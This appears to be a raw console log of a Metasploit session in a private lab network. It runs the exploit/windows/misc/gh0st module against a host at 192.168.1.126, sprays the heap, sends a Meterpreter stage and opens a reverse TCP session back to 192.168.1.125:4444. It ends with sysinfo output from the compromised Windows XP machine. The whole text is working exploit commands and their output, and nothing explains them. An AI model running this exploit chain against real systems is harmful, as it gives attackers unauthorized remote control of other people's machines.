msf > use exploit/windows/misc/gh0st msf exploit(gh0st) > set RHOST 192.168.1.126 RHOST => 192.168.1.126 msf exploit(gh0st) > run
[*] Started reverse TCP handler on 192.168.1.125:4444 [*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6 [*] 192.168.1.126:80 - Spraying heap... [*] 192.168.1.126:80 - Trying command 103... [*] Sending stage (957999 bytes) to 192.168.1.126 [*] Meterpreter session 1 opened (192.168.1.125:4444 -> 192.168.1.126:1070) at 2017-09-15 16:22:56 +0800 [*] 192.168.1.126:80 - Server closed connection
meterpreter > sysinfo Computer : K8ANTI-B2B9B81C OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >